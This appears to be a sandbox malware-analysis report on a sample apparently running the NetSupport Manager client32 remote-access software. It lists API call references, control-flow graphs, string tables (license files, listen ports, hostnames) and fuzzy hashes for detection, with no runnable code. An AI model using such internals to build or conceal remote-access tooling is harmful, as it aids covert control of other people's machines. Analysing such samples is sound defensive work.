                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                      • String ID:
                                                                                      • API String ID: 81990902-0
                                                                                      • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                      • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                      • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                      • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                      Function 1102E640 Relevance: 241.6, APIs: 31, Strings: 106, Instructions: 1869windowthreadsleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                      • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                        • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                        • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                        • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                      • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                      • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                        • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                        • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                        • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                      • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                      • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                      • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                      • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                      • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                      • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                      • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                      • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                      • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                        • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                        • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                        • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                        • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                      • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                      • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                      • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                      • SetWindowPos.USER32(00030496,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                      • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                      • wsprintfA.USER32 ref: 1102FFA5
                                                                                      • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                        • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,A1BC2D8B,00000002,74DF2EE0), ref: 1112820A
                                                                                        • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                        • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                      • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$051829$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                      • API String ID: 1099283604-2655008560
                                                                                      • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                      • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                      • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                      • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52
                                                                                      Function 1102DB00 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1128 1102db00-1102db50 call 1110f420 1131 1102db52-1102db66 call 11142a60 1128->1131 1132 1102db68 1128->1132 1134 1102db6e-1102dbb3 call 11142290 call 11142ac0 1131->1134 1132->1134 1140 1102dd53-1102dd62 call 11144dc0 1134->1140 1141 1102dbb9 1134->1141 1147 1102dd68-1102dd78 1140->1147 1142 1102dbc0-1102dbc3 1141->1142 1145 1102dbc5-1102dbc7 1142->1145 1146 1102dbe8-1102dbf1 1142->1146 1148 1102dbd0-1102dbe1 1145->1148 1149 1102dbf7-1102dbfe 1146->1149 1150 1102dd24-1102dd3d call 11142ac0 1146->1150 1151 1102dd7a 1147->1151 1152 1102dd7f-1102dd93 call 1102cc10 1147->1152 1148->1148 1153 1102dbe3 1148->1153 1149->1150 1154 1102dcf3-1102dd08 call 11162de7 1149->1154 1155 1102dc05-1102dc07 1149->1155 1156 1102dd0a-1102dd1f call 11162de7 1149->1156 1157 1102dc9a-1102dccd call 111618c1 call 11142290 1149->1157 1158 1102dcdb-1102dcf1 call 11164010 1149->1158 1159 1102dc8b-1102dc95 1149->1159 1160 1102dccf-1102dcd9 1149->1160 1161 1102dc4c-1102dc52 1149->1161 1162 1102dc7c-1102dc86 1149->1162 1150->1142 1180 1102dd43-1102dd45 1150->1180 1151->1152 1176 1102dd98-1102dd9d 1152->1176 1153->1150 1154->1150 1155->1150 1167 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1155->1167 1156->1150 1157->1150 1158->1150 1159->1150 1160->1150 1169 1102dc54-1102dc68 call 11162de7 1161->1169 1170 1102dc6d-1102dc77 1161->1170 1162->1150 1167->1150 1169->1150 1170->1150 1182 1102de43-1102de5d call 111463d0 1176->1182 1185 1102dda3-1102ddc8 call 110b7920 call 11146450 1176->1185 1180->1182 1183 1102dd4b-1102dd51 1180->1183 1195 1102deb3-1102debf call 1102b4f0 1182->1195 1196 1102de5f-1102de78 call 1105dd10 1182->1196 1183->1140 1183->1147 1203 1102ddd3-1102ddd9 1185->1203 1204 1102ddca-1102ddd1 1185->1204 1208 1102dec1-1102dec8 1195->1208 1209 1102de98-1102de9f 1195->1209 1196->1195 1207 1102de7a-1102de8c 1196->1207 1210 1102dddb-1102dde2 call 11027d60 1203->1210 1211 1102de39 1203->1211 1204->1182 1207->1195 1223 1102de8e 1207->1223 1212 1102dea5-1102dea8 1208->1212 1214 1102deca-1102ded4 1208->1214 1209->1212 1213 1102e0aa-1102e0cb GetComputerNameA 1209->1213 1210->1211 1222 1102dde4-1102de16 1210->1222 1211->1182 1219 1102deaa-1102deb1 call 110b7920 1212->1219 1220 1102ded9 1212->1220 1216 1102e103-1102e109 1213->1216 1217 1102e0cd-1102e101 call 11027c30 1213->1217 1214->1213 1225 1102e10b-1102e110 1216->1225 1226 1102e13f-1102e152 call 11164010 1216->1226 1217->1216 1247 1102e157-1102e163 1217->1247 1227 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1219->1227 1220->1227 1240 1102de20-1102de2f call 110f6080 1222->1240 1241 1102de18-1102de1e 1222->1241 1223->1209 1230 1102e116-1102e11a 1225->1230 1246 1102e347-1102e36a 1226->1246 1276 1102e07a-1102e082 SetLastError 1227->1276 1277 1102dfbc-1102dfd3 1227->1277 1237 1102e136-1102e138 1230->1237 1238 1102e11c-1102e11e 1230->1238 1245 1102e13b-1102e13d 1237->1245 1243 1102e132-1102e134 1238->1243 1244 1102e120-1102e126 1238->1244 1249 1102de32-1102de34 call 1102d330 1240->1249 1241->1240 1241->1249 1243->1245 1244->1237 1251 1102e128-1102e130 1244->1251 1245->1226 1245->1247 1261 1102e392-1102e39a 1246->1261 1262 1102e36c-1102e372 1246->1262 1256 1102e165-1102e17a call 110b7920 call 11029bd0 1247->1256 1257 1102e17c-1102e18f call 11081a70 1247->1257 1249->1211 1251->1230 1251->1243 1282 1102e1d3-1102e1ec call 11081a70 1256->1282 1273 1102e191-1102e1b4 1257->1273 1274 1102e1b6-1102e1b8 1257->1274 1265 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1261->1265 1266 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1261->1266 1262->1261 1264 1102e374-1102e38d call 1102d330 1262->1264 1264->1261 1266->1265 1273->1282 1275 1102e1c0-1102e1d1 1274->1275 1275->1275 1275->1282 1286 1102e043-1102e04f 1276->1286 1277->1286 1298 1102dfd5-1102dfde 1277->1298 1300 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1282->1300 1301 1102e32c-1102e339 call 11164010 1282->1301 1290 1102e092-1102e0a1 1286->1290 1291 1102e051-1102e05d 1286->1291 1290->1213 1294 1102e0a3-1102e0a4 FreeLibrary 1290->1294 1296 1102e06f-1102e073 1291->1296 1297 1102e05f-1102e06d GetProcAddress 1291->1297 1294->1213 1303 1102e084-1102e086 SetLastError 1296->1303 1304 1102e075-1102e078 1296->1304 1297->1296 1298->1286 1302 1102dfe0-1102e016 call 11146450 call 1112b270 1298->1302 1340 1102e283-1102e299 call 11128ec0 1300->1340 1341 1102e26f-1102e27e call 11029450 1300->1341 1318 1102e33c-1102e341 CharUpperA 1301->1318 1302->1286 1323 1102e018-1102e03e call 11146450 call 11027920 1302->1323 1309 1102e08c 1303->1309 1304->1309 1309->1290 1318->1246 1323->1286 1345 1102e2b2-1102e2ec call 110d0bd0 * 2 1340->1345 1346 1102e29b-1102e2ad call 110d0bd0 1340->1346 1341->1340 1353 1102e302-1102e32a call 11164010 call 110d07c0 1345->1353 1354 1102e2ee-1102e2fd call 11029450 1345->1354 1346->1345 1353->1318 1354->1353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc_memsetwsprintf
                                                                                      • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$051829$14/03/16 10:38:31 V12.10F8$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                      • API String ID: 3802068140-1050804309
                                                                                      • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                      • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                      • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                      • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51
                                                                                      Function 6C5E3D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1780 6c5e3d00-6c5e3d42 call 6c5f1c50 call 6c5e3b80 1784 6c5e3d47-6c5e3d4f 1780->1784 1785 6c5e3d6c-6c5e3d6e 1784->1785 1786 6c5e3d51-6c5e3d6b call 6c5f28e1 1784->1786 1788 6c5e3d87-6c5e3da1 call 6c5d8fb0 1785->1788 1789 6c5e3d70-6c5e3d84 call 6c5d6f50 1785->1789 1795 6c5e3dc5-6c5e3e44 call 6c5d5e90 * 2 call 6c5e7be0 call 6c5d5e20 lstrlenA 1788->1795 1796 6c5e3da3-6c5e3dc4 call 6c5d63c0 call 6c5f28e1 1788->1796 1789->1788 1809 6c5e3e98-6c5e3fbe call 6c5d5500 call 6c5d6050 call 6c5e7c70 * 2 call 6c5e7d00 * 3 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5e7d00 gethostname call 6c5e7d00 call 6c5db8e0 1795->1809 1810 6c5e3e46-6c5e3e95 call 6c5ed8b0 call 6c5d5060 call 6c5d4830 call 6c5f1bfd 1795->1810 1845 6c5e3fc5-6c5e3fe1 call 6c5e7d00 1809->1845 1846 6c5e3fc0 1809->1846 1810->1809 1849 6c5e3ff8-6c5e3ffe 1845->1849 1850 6c5e3fe3-6c5e3ff5 call 6c5e7d00 1845->1850 1846->1845 1852 6c5e421a-6c5e4263 call 6c5e7b60 call 6c5f1bfd call 6c5d98d0 call 6c5e77e0 1849->1852 1853 6c5e4004-6c5e4022 call 6c5d5e20 1849->1853 1850->1849 1881 6c5e4265-6c5e4291 call 6c5da4e0 call 6c5f28e1 1852->1881 1882 6c5e4292-6c5e42aa call 6c5f28e1 1852->1882 1859 6c5e405a-6c5e4084 call 6c5d5e20 1853->1859 1860 6c5e4024-6c5e4057 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd 1853->1860 1870 6c5e408a-6c5e41ce call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5d5e20 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5d5e20 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5d5e20 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd 1859->1870 1871 6c5e41d1-6c5e4217 call 6c5e7d00 call 6c5d5e20 call 6c5e7d00 1859->1871 1860->1859 1870->1871 1871->1852
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: *Dept$*Gsk$051829$1.1$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                      • API String ID: 2102423945-1357414646
                                                                                      • Opcode ID: 6d435d229b3b4486908d5cddf25466578f610b9cc7e2ac30755706ff97e1e4e5
                                                                                      • Instruction ID: 78ceed8447a9ae39e8a9817248ff21eb9eee86c501455ac377cf3cee1fdc15f7
                                                                                      • Opcode Fuzzy Hash: 6d435d229b3b4486908d5cddf25466578f610b9cc7e2ac30755706ff97e1e4e5
                                                                                      • Instruction Fuzzy Hash: D0E1A7B2D0021CAACB24DB68DC81FEF7779DF99206F4045D5E50963A41DB30AF888FA5
                                                                                      Function 110A9C90 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2021 110a9c90-110a9cf2 LoadLibraryA GetProcAddress 2022 110a9cf8-110a9d09 SetupDiGetClassDevsA 2021->2022 2023 110a9e05-110a9e0d SetLastError 2021->2023 2024 110a9d0f-110a9d1d 2022->2024 2025 110a9f13-110a9f15 2022->2025 2028 110a9e19-110a9e1b SetLastError 2023->2028 2029 110a9d20-110a9d24 2024->2029 2026 110a9f1e-110a9f20 2025->2026 2027 110a9f17-110a9f18 FreeLibrary 2025->2027 2030 110a9f37-110a9f52 call 11161d01 2026->2030 2027->2026 2031 110a9e21-110a9e2c GetLastError 2028->2031 2032 110a9d3d-110a9d55 2029->2032 2033 110a9d26-110a9d37 GetProcAddress 2029->2033 2034 110a9e32-110a9e3d call 11162be5 2031->2034 2035 110a9ec0-110a9ed1 GetProcAddress 2031->2035 2032->2031 2042 110a9d5b-110a9d5d 2032->2042 2033->2028 2033->2032 2034->2029 2039 110a9edb-110a9edd SetLastError 2035->2039 2040 110a9ed3-110a9ed9 SetupDiDestroyDeviceInfoList 2035->2040 2044 110a9ee3-110a9ee5 2039->2044 2040->2044 2046 110a9d68-110a9d6a 2042->2046 2047 110a9d5f-110a9d65 call 11162be5 2042->2047 2044->2025 2045 110a9ee7-110a9f09 CreateFileA 2044->2045 2048 110a9f0b-110a9f10 call 11162be5 2045->2048 2049 110a9f22-110a9f2c call 11162be5 2045->2049 2051 110a9d6c-110a9d7f GetProcAddress 2046->2051 2052 110a9d85-110a9d9b 2046->2052 2047->2046 2048->2025 2061 110a9f2e-110a9f2f FreeLibrary 2049->2061 2062 110a9f35 2049->2062 2051->2052 2055 110a9e42-110a9e4a SetLastError 2051->2055 2060 110a9d9d-110a9da6 GetLastError 2052->2060 2063 110a9dac-110a9dbf call 11162b51 2052->2063 2055->2060 2060->2063 2064 110a9e81-110a9e92 call 110a9c30 2060->2064 2061->2062 2062->2030 2071 110a9ea2-110a9eb3 call 110a9c30 2063->2071 2072 110a9dc5-110a9dcd 2063->2072 2069 110a9e9b-110a9e9d 2064->2069 2070 110a9e94-110a9e95 FreeLibrary 2064->2070 2069->2030 2070->2069 2071->2069 2079 110a9eb5-110a9ebe FreeLibrary 2071->2079 2074 110a9dcf-110a9de2 GetProcAddress 2072->2074 2075 110a9de4-110a9dfb 2072->2075 2074->2075 2076 110a9e4f-110a9e51 SetLastError 2074->2076 2080 110a9e57-110a9e71 call 110a9c30 call 11162be5 2075->2080 2081 110a9dfd-110a9e00 2075->2081 2076->2080 2079->2030 2080->2069 2086 110a9e73-110a9e7c FreeLibrary 2080->2086 2081->2029 2086->2030
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(setupapi.dll,A1BC2D8B,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                      • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                      • _free.LIBCMT ref: 110A9D60
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                      • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                      • _malloc.LIBCMT ref: 110A9DB3
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                      • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                      • GetLastError.KERNEL32 ref: 110A9E21
                                                                                      • _free.LIBCMT ref: 110A9E33
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E51
